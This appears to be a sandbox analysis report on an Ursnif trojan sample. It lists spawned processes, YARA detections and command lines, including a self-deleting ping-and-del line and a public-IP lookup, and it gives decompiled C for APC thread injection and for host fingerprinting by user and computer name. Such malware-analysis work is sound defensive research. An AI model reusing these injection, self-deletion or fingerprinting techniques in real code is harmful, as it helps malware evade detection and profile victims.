Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 6272 Parent PID: 6736

General

Start time:	20:59:50
Start date:	23/11/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP"
Imagebase:	0x7ff7bcf00000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: csc.exe PID: 5464 Parent PID: 4856

General

Start time:	20:59:55
Start date:	23/11/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Imagebase:	0x7ff76af80000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 6088 Parent PID: 5464

General

Start time:	20:59:57
Start date:	23/11/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP"
Imagebase:	0x7ff7bcf00000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3352 Parent PID: 2904

General

Start time:	20:59:58
Start date:	23/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7028 Parent PID: 3352

General

Start time:	21:00:14
Start date:	23/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Imagebase:	0x7ff688850000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5016 Parent PID: 7028

General

Start time:	21:00:15
Start date:	23/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: PING.EXE PID: 4712 Parent PID: 7028

General

Start time:	21:00:15
Start date:	23/11/2021
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 5
Imagebase:	0x7ff611020000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4084 Parent PID: 3352

General

Start time:	21:00:24
Start date:	23/11/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 6080 Parent PID: 2904

General

Start time:	21:00:25
Start date:	23/11/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff7d6010000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4176 Parent PID: 3352

General

Start time:	21:00:45
Start date:	23/11/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4440 Parent PID: 3352

General

Start time:	21:01:06
Start date:	23/11/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4544 Parent PID: 3352

General

Start time:	21:01:20
Start date:	23/11/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 6536 Parent PID: 3352

General

Start time:	21:01:26
Start date:	23/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1"
Imagebase:	0x7ff688850000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 1504 Parent PID: 3352

General

Start time:	21:01:26
Start date:	23/11/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6736 Parent PID: 6536

General

Start time:	21:01:32
Start date:	23/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: nslookup.exe PID: 5192 Parent PID: 6536

General

Start time:	21:01:32
Start date:	23/11/2021
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	nslookup myip.opendns.com resolver1.opendns.com
Imagebase:	0x7ff779890000
File size:	86528 bytes
MD5 hash:	AF1787F1DBE0053D74FC687E7233F8CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3424 Parent PID: 3352

General

Start time:	21:01:34
Start date:	23/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1"
Imagebase:	0x7ff688850000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5208 Parent PID: 3424

General

Start time:	21:01:35
Start date:	23/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6088 Parent PID: 3352

General

Start time:	21:01:36
Start date:	23/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exe PID: 5660 Parent PID: 6088

General

Start time:	21:01:38
Start date:	23/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: FpYf5EGDO9.exe PID: 5556 Parent PID: 3100 FpYf5EGDO9.exeCOMMON

Executed Functions

Function 0042F2F0, Relevance: 37.7, APIs: 4, Strings: 17, Instructions: 924COMMON

Download Yara Rule

Strings

xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo, xrefs: 0042F962
Regefiri, xrefs: 0042F642
ecucedidulola sedelalex zapexukigasu jihiwexogucup, xrefs: 0042F6B3
furafizasuyesipebokevocejirijan, xrefs: 0042FA07
mikujukezicuharu, xrefs: 0042FA0C
\H, xrefs: 0042F90D
geceyuhocavanino goruyitozekitapopit, xrefs: 0042F6C9
Vefu mif kaxigija puhirege puwuf, xrefs: 0042F638
Hagavete buyihexinag remibumepupabo gojokekisila, xrefs: 0042F63D
zijiwe, xrefs: 0042F92E
iyeg xogahes yoxohavit jobikuz, xrefs: 0042F6AE
pemahu, xrefs: 0042F5E9
mecevituxe, xrefs: 0042FA02
"Y?, xrefs: 0042F982
dunuviwujamenopigomareg, xrefs: 0042F6A7
zetipabobutobawekicugi, xrefs: 0042F9FD
Xegixaze, xrefs: 0042F6B8

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID:
String ID: "Y?$Hagavete buyihexinag remibumepupabo gojokekisila$Regefiri$Vefu mif kaxigija puhirege puwuf$Xegixaze$dunuviwujamenopigomareg$ecucedidulola sedelalex zapexukigasu jihiwexogucup$furafizasuyesipebokevocejirijan$geceyuhocavanino goruyitozekitapopit$iyeg xogahes yoxohavit jobikuz$mecevituxe$mikujukezicuharu$pemahu$xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo$zetipabobutobawekicugi$zijiwe$\H
API String ID: 0-1989479481
Opcode ID: 7977f4aec624c1d55ffdf2d442a6866ede98fab778933524ae433ece5ad86d1e
Instruction ID: 19b9c9d0e76d8d0b69035ea67ad0231da9e6ef1e2135d6353bef941b955ca3f7
Opcode Fuzzy Hash: 7977f4aec624c1d55ffdf2d442a6866ede98fab778933524ae433ece5ad86d1e
Instruction Fuzzy Hash: 73623C71145350BFE3209BA1EE4DFEB7BB8EB89B01F00452DF24AE50A0DBB45545CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004019A0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 140
threadsleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004019A0() {
				long _v8;
				long _v12;
				long _v16;
				void* _v40;
				void* __edi;
				long _t31;
				long _t33;
				long _t34;
				void* _t37;
				long _t40;
				long _t41;
				long _t45;
				void* _t48;
				struct _SECURITY_ATTRIBUTES* _t50;
				signed int _t54;
				signed int _t55;
				struct _SECURITY_ATTRIBUTES* _t59;
				long _t61;
				signed int _t62;
				void* _t66;
				void* _t69;
				signed int _t71;
				signed int _t72;
				void* _t75;
				intOrPtr* _t76;

				_t31 = E00401752();
				_t59 = 0;
				_v8 = _t31;
				if(_t31 != 0) {
					return _t31;
				}
				do {
					_t71 = 0;
					_v16 = _t59;
					_v12 = 0x30;
					do {
						_t66 = E004016EE(_v12);
						if(_t66 == _t59) {
							_v8 = 8;
						} else {
							_t54 = NtQuerySystemInformation(8, _t66, _v12,  &_v16); // executed
							_t62 = _t54;
							_t55 = _t54 & 0x0000ffff;
							_v8 = _t55;
							if(_t55 == 4) {
								_v12 = _v12 + 0x30;
							}
							_t72 = 0x13;
							_t15 = _t62 + 1; // 0x1
							_t71 =  *_t66 % _t72 + _t15;
							E004017CB(_t66);
						}
					} while (_v8 != _t59);
					_t33 = E004014AD(_t66, _t71); // executed
					_v8 = _t33;
					Sleep(_t71 << 4); // executed
					_t34 = _v8;
				} while (_t34 == 9);
				if(_t34 != _t59) {
					L28:
					return _t34;
				}
				if(E004017E0(_t62,  &_v12) != 0) {
					 *0x4030f8 = _t59;
					L18:
					_t37 = CreateThread(_t59, _t59, __imp__SleepEx,  *0x403100, _t59, _t59); // executed
					_t75 = _t37;
					if(_t75 == _t59) {
						L25:
						_v8 = GetLastError();
						L26:
						_t34 = _v8;
						if(_t34 == 0xffffffff) {
							_t34 = GetLastError();
						}
						goto L28;
					}
					_t40 = QueueUserAPC(E004013C4, _t75,  &_v40); // executed
					if(_t40 == 0) {
						_t45 = GetLastError();
						_v16 = _t45;
						TerminateThread(_t75, _t45);
						CloseHandle(_t75);
						_t75 = 0;
						SetLastError(_v16);
					}
					if(_t75 == 0) {
						goto L25;
					} else {
						_t41 = WaitForSingleObject(_t75, 0xffffffff);
						_v8 = _t41;
						if(_t41 == 0) {
							GetExitCodeThread(_t75,  &_v8); // executed
						}
						CloseHandle(_t75);
						goto L26;
					}
				}
				_t76 = __imp__GetLongPathNameW;
				_t61 = _v12;
				_t48 =  *_t76(_t61, _t59, _t59); // executed
				_t69 = _t48;
				if(_t69 == 0) {
					L15:
					 *0x4030f8 = _t61;
					L16:
					_t59 = 0;
					goto L18;
				}
				_t23 = _t69 + 2; // 0x2
				_t50 = E004016EE(_t69 + _t23);
				 *0x4030f8 = _t50;
				if(_t50 == 0) {
					goto L15;
				}
				 *_t76(_t61, _t50, _t69); // executed
				E004017CB(_t61);
				goto L16;
			}

0x004019a7
0x004019ac
0x004019ae
0x004019b3
0x00401b1b
0x00401b1b
0x004019bb
0x004019bb
0x004019bd
0x004019c0
0x004019c7
0x004019cf
0x004019d3
0x00401a0d
0x004019d5
0x004019df
0x004019e5
0x004019e7
0x004019ec
0x004019f2
0x004019f4
0x004019f4
0x004019fc
0x00401a02
0x00401a02
0x00401a06
0x00401a06
0x00401a14
0x00401a1a
0x00401a23
0x00401a26
0x00401a2c
0x00401a2f
0x00401a36
0x00401b17
0x00000000
0x00401b18
0x00401a47
0x00401a87
0x00401a8d
0x00401a9d
0x00401aa3
0x00401aad
0x00401b08
0x00401b0a
0x00401b0d
0x00401b0d
0x00401b13
0x00401b15
0x00401b15
0x00000000
0x00401b13
0x00401ab9
0x00401ac7
0x00401ac9
0x00401acd
0x00401ad0
0x00401ad7
0x00401adc
0x00401ade
0x00401ade
0x00401ae6
0x00000000
0x00401ae8
0x00401aeb
0x00401af1
0x00401af6
0x00401afd
0x00401afd
0x00401b04
0x00000000
0x00401b04
0x00401ae6
0x00401a49
0x00401a51
0x00401a55
0x00401a57
0x00401a5b
0x00401a7d
0x00401a7d
0x00401a83
0x00401a83
0x00000000
0x00401a83
0x00401a5d
0x00401a62
0x00401a67
0x00401a6e
0x00000000
0x00000000
0x00401a73
0x00401a76
0x00000000

APIs

Part of subcall function 00401752: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019AC), ref: 00401761
Part of subcall function 00401752: GetVersion.KERNEL32 ref: 00401770
Part of subcall function 00401752: GetCurrentProcessId.KERNEL32 ref: 0040178C
Part of subcall function 00401752: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004017A5

Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA

NtQuerySystemInformation.NTDLL ref: 004019DF
Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A26
GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A55
GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A73
CreateThread.KERNEL32 ref: 00401A9D
QueueUserAPC.KERNEL32(004013C4,00000000,?,?,00000000), ref: 00401AB9
GetLastError.KERNEL32(?,00000000), ref: 00401AC9
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401AD0
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401AD7
SetLastError.KERNEL32(?,?,00000000), ref: 00401ADE
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401AEB
GetExitCodeThread.KERNEL32(00000000,00000008,?,00000000), ref: 00401AFD
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B04
GetLastError.KERNEL32(?,00000000), ref: 00401B08
GetLastError.KERNEL32(?,00000000), ref: 00401B15

Strings

0, xrefs: 004019F4

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Thread$CloseCreateHandleLongNamePathProcess$AllocCodeCurrentEventExitHeapInformationObjectOpenQueryQueueSingleSleepSystemTerminateUserVersionWait
String ID: 0
API String ID: 2806485730-4108050209
Opcode ID: 3788db5b3d14facb3acde25c59a1a62789e76d27affbce678ad3d56668680855
Instruction ID: 752d4060508721c6492002363c13e596e1a4780a18635d73c6680d1c48b3a507
Opcode Fuzzy Hash: 3788db5b3d14facb3acde25c59a1a62789e76d27affbce678ad3d56668680855
Instruction Fuzzy Hash: 5F417371D01215ABDB11AFE58D88D9F7ABCAF08314B10417BE601F32A0E7789E44CB68

Uniqueness

Uniqueness Score: -1.00%

Function 03C47A2E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E03C47A2E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x3c4d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E03C44F97( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x3c4d2a4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x3c4d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E03C42C0D(_v8 + _v8, _t64);
							}
							HeapFree( *0x3c4d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x3c4d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E03C42C0D(_v8 + _v8, _t64);
						}
						HeapFree( *0x3c4d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x03c47a2e
0x03c47a36
0x03c47a3a
0x03c47a3d
0x03c47a42
0x03c47a44
0x03c47a49
0x03c47a49
0x03c47a4f
0x03c47a51
0x03c47a5e
0x03c47abf
0x03c47a60
0x03c47a65
0x03c47a6b
0x03c47a70
0x03c47a7e
0x03c47a82
0x03c47a91
0x03c47a98
0x03c47a9f
0x03c47a9f
0x03c47aaa
0x03c47aaa
0x03c47a82
0x03c47a70
0x03c47ac1
0x03c47ac7
0x03c47ad1
0x03c47ad3
0x03c47ad8
0x03c47ae7
0x03c47aeb
0x03c47af6
0x03c47afd
0x03c47b04
0x03c47b04
0x03c47b10
0x03c47b10
0x03c47aeb
0x03c47b1b
0x03c47b1d
0x03c47b20
0x03c47b22
0x03c47b25
0x03c47b28
0x03c47b32
0x03c47b36
0x03c47b3a

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 03C47A65
RtlAllocateHeap.NTDLL(00000000,?), ref: 03C47A7C
GetUserNameW.ADVAPI32(00000000,?), ref: 03C47A89
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,03C430EE), ref: 03C47AAA
GetComputerNameW.KERNEL32(00000000,00000000), ref: 03C47AD1
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03C47AE5
GetComputerNameW.KERNEL32(00000000,00000000), ref: 03C47AF2
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,03C430EE), ref: 03C47B10

Strings

Ut, xrefs: 03C47AAA, 03C47B10

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Ut
API String ID: 3239747167-8415677
